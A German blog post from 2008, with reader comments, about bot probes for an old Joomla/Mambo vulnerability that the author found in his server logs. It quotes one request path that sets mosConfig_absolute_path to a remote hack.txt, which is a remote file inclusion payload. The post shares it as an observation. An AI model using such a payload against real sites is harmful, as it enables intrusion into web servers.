Joomla CMS Hack

Ich nutze hier im Blog definitiv WordPress, aber zahlreiche Anfragen werden auf nicht-existente URLs gemacht, die wohl irgendwie eine Hintertür beim Joomla CMS öffnen sollen. Hier ein Beispiel:

/////////////?mosConfig_absolute_path=http://sonstwo.server.com/hack.txt

Scheinbar ist die mosConfig_absolute_path im Joomla CMS oder in veralteten Versionen absolut anfällig für zwischenmenschliche Schandtaten… naja, das wollte ich auch nur mal so mitteilen.

Link speichern...

6 Antworten zu “Joomla CMS Hack”


  1. 1 Pepino Feb 12th, 2008 at 22:25

    Kann ich nur Bestätigen (die Einbruchsversuche)… allerdings scheinen die Täter nicht viel Know-How zu besitzen…

  2. 2 Mike Schnoor Feb 12th, 2008 at 22:26

    Ich möchte ja fast diese dilletantistischen Momente so richtig an den Pranger stellen und die IPs preisgeben, aber näää… :P

  3. 3 Pepino Feb 12th, 2008 at 22:37

    Ich veröffentliche manchmal Anweisungen für die .htaccess-Datei… das befriedigt auch ;-)

  4. 4 Moellus Feb 12th, 2008 at 22:40

    Diese bots tun nix, die wollen nur spielen. grep mal nach tikiwiki.
    So, ick muss twittern.

  5. 5 Michael Feb 13th, 2008 at 15:28

    Mir graut es jedesmal wenn ich in meine Logfiles schaue. Was da an “Angriffen” reinkommt ist nicht mehr lustig und es wird subjektiv immer mehr.

    @Moellus:

    Ist das gemeint: “Eine Schwachstelle in TikiWiki 1.9.8 kann von einem Angreifer dazu ausgenutzt werden, beliebigen Programmcode auf dem beherbergenden Rechnersystem auszuführen. Es ist bereits funktionierender Exploit Code in Umlauf und die Schwachstelle wird bereits aktiv ausgenutzt. Es ist noch kein Patch verfügbar, …”?

  6. 6 Xel Feb 15th, 2008 at 23:50

    Och - das ist ne alte Lücke… müsste aber schon lange gestopft sein… (wobei denkbar währe, dass es eigentlich eher ne Mambo Lücke war - kann ich aber nicht genau sagen) so ungefähr seit Joomla eine Register Globals = “Off” Emulation hat ;-)

    “allerdings scheinen die Täter nicht viel Know-How zu besitzen…”
    Glaubst du? Es ist weniger Aufwand den “Hack”versuch direkt zu begehen, als erst die Startseite zu laden und zu versuchen herauszufinden, ob denn das Zielsystem installiert ist.

    Was IPs angeht… Botnetze und Zobierechner sowie wechselnde IPs machen einem das Leben manchmal zur Hölle, wenn man IPs blocken möchte ;-)

Kommentar schreiben

XHTML: Du kannst diese HTML-Tags zum Kommentieren nutzen: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong>

Hier finden sich Hinweise zu manuellen Trackbacks und sogar zu Kommentaren mit werblichem Charakter.







Mein Name ist Mike Schnoor und ich präsentiere dem frivolen Internetuser ein erstklassig privat geführtes Medienblog. Die Themen siedeln sich zentral in der Medienwelt an: Web 2.0, Weblogs, Video on Demand, TV, Radio, Print, Medien, Marketing und Kommunikation.

Wer anderer Meinung ist, erreicht mich schnell über das Kontaktformular oder darf noch ein wenig weiter über alles lesen.

  • Online seit: 11. Dezember 2003
  • Anzahl Beiträge: 2255
  • Anzahl Kommentare: 6206
  • Anzahl Kategorien: 28
  • Anzahl Tags: 3238


© Copyright 1997-2008 by Mike Schnoor. All rights reserved. Telagon Sichelputzer is powered by WordPress: RSS Beiträge und RSS Kommentare
Über uns | Archiv | Kontakt | Login | Datenschutz | Impressum